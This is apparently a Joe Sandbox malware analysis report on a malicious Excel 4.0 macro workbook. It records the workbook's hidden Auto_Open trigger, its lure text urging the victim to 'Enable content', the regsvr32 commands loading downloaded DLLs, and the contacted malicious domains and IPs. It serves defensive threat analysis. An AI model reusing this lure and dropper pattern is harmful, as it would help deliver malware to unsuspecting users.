Loading ...

Play interactive tourEdit tour

Windows Analysis Report idea-22543577.xlsm

Overview

General Information

Sample Name:idea-22543577.xlsm
Analysis ID:438634
MD5:690a255b0f1b59b3421800bab8b41c10
SHA1:1036eaadc0201b50d3d005ad05e208888021b945
SHA256:2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2352 cmdline: regsvr32 ..\wail1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2392 cmdline: regsvr32 ..\wail2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\wail1.dll, CommandLine: regsvr32 ..\wail1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2492, ProcessCommandLine: regsvr32 ..\wail1.dll, ProcessId: 2352

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: senderoalcielo.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 108.167.165.249:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 108.167.165.249:443
Source: Joe Sandbox ViewIP Address: 5.100.155.169 5.100.155.169
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3B3626.pngJump to behavior
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: senderoalcielo.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2151924460.0000000003A60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2132271668.0000000003970000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2150993644.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2131607908.0000000001C40000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2151924460.0000000003A60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2132271668.0000000003970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownHTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 15 16 Protected View
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 19 the decryption of the docum
Source: Document image extraction number: 0Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 0Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 0 Protected View This
Source: Document image extraction number: 1Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: idea-22543577.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: 1" sheetId="16" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="17" r:id="rId2"/><sheet name="Sheet1" sheetId="4" r:id="rId3"/><sheet name="Sheet2" sheetId="12" r:id="rId4"/><sheet name="Sheet4" sheetId="10" state="hidden" r:id="rId5"/><sheet name="Sheet5" sheetId="11" state="hidden" r:id="rId6"/><sheet name="Sheet6" sheetId="15" state="hidden" r:id="rId7"/><sheet name="Sheet7" sheetId="14" state="hidden" r:id="rId8"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet6!$AJ$9</definedName></definedNames><calcPr calcId="122211"/></workbook>
Source: regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.evad.winXLSM@5/13@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$idea-22543577.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRECBE.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\wail1.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\wail2.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\wail1.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\wail2.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\wail1.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2328Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2408Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Regsvr321OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
theottomandoner.com
5.100.155.169
truefalse
    unknown
    senderoalcielo.com
    108.167.165.249
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comregsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpfalse
              high
              http://www.%s.comPAregsvr32.exe, 00000003.00000002.2151924460.0000000003A60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2132271668.0000000003970000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2151924460.0000000003A60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2132271668.0000000003970000.00000002.00000001.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2155075481.0000000004AC7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136756609.0000000004A37000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpfalse
                  high
                  http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2150993644.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2131607908.0000000001C40000.00000002.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/regsvr32.exe, 00000003.00000002.2154816088.00000000048E0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2136554514.0000000004850000.00000002.00000001.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    5.100.155.169
                    theottomandoner.comUnited Kingdom
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    108.167.165.249
                    senderoalcielo.comUnited States
                    46606UNIFIEDLAYER-AS-1USfalse

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:438634
                    Start date:22.06.2021
                    Start time:21:08:44
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 41s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:idea-22543577.xlsm
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal64.expl.evad.winXLSM@5/13@2/2
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsm
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Found warning dialog
                    • Click Ok
                    • Found warning dialog
                    • Click Ok
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 173.222.108.210, 173.222.108.226, 93.184.221.240
                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/438634/sample/idea-22543577.xlsm

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    21:10:01API Interceptor2x Sleep call for process: regsvr32.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    5.100.155.169http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074Get hashmaliciousBrowse
                    • y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    UNIFIEDLAYER-AS-1USFra8994.exeGet hashmaliciousBrowse
                    • 162.241.60.126
                    WXs8v9QuE7.exeGet hashmaliciousBrowse
                    • 50.87.146.99
                    tender-1235416393.xlsmGet hashmaliciousBrowse
                    • 192.185.88.195
                    tender-1235416393.xlsmGet hashmaliciousBrowse
                    • 192.185.88.195
                    Order.exeGet hashmaliciousBrowse
                    • 108.167.183.94
                    Habib_Bank Payment Advice.doc__.rtfGet hashmaliciousBrowse
                    • 162.144.79.7
                    heoN5wnP2d.exeGet hashmaliciousBrowse
                    • 74.220.199.8
                    FidKy67SWO.exeGet hashmaliciousBrowse
                    • 192.254.185.252
                    RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                    • 50.87.249.240
                    plan-1637276620.xlsmGet hashmaliciousBrowse
                    • 192.185.21.116
                    idea-1232922316.xlsbGet hashmaliciousBrowse
                    • 162.241.194.107
                    Orden de compra.exeGet hashmaliciousBrowse
                    • 192.185.0.218
                    Drawing.exeGet hashmaliciousBrowse
                    • 162.241.61.229
                    aim-1028486377.xlsbGet hashmaliciousBrowse
                    • 192.232.222.161
                    VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                    • 162.214.148.174
                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                    • 162.241.87.244
                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                    • 162.241.61.218
                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                    • 162.241.87.244
                    eHTLcWfhgv.exeGet hashmaliciousBrowse
                    • 74.220.199.8
                    Lebanon Khayat Trading Company.exeGet hashmaliciousBrowse
                    • 192.254.185.244
                    PUBLIC-DOMAIN-REGISTRYUSFra8995.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Fra8996.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Fra8997.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    plan-1637276620.xlsmGet hashmaliciousBrowse
                    • 103.50.160.62
                    aim-1028486377.xlsbGet hashmaliciousBrowse
                    • 103.21.59.25
                    7qVSiXSTdETO7cX.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    PI Invoice.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Payment Advice Note from 21.06.2021 to 608720.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    Inquiry pdf.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    HYr6YeH1RP.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    fng1AXSgue.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    memorandum.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    Bank Betails.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    SecuriteInfo.com.Trojan.PackedNET.854.8381.exeGet hashmaliciousBrowse
                    • 208.91.199.233
                    AWB & Shipping Documents.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    order no ORD00404083_01.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    PO#4500484210.exeGet hashmaliciousBrowse
                    • 208.91.199.233
                    Request for Catalog and quotation.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    INQUIRY pdf.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    Img-347654566091234.exeGet hashmaliciousBrowse
                    • 208.91.199.223

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406btender-1235416393.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    Payment Ref 24,845.docxGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    plan-1637276620.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    TT_COPY.MT103.SWIFT.docxGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    MT103.docxGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    Purchase_Order.docGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    KTOpmUzBlp.xlsGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.19092.rtfGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    aim-1860610262.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    otKl5DLaUo.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    bKYGBZ8BPl.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-1127603629.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-1134058065.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-1132671574.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-1128721882.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-108527315.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    idea-112755060.xlsmGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
                    viru.xlsGet hashmaliciousBrowse
                    • 5.100.155.169
                    • 108.167.165.249
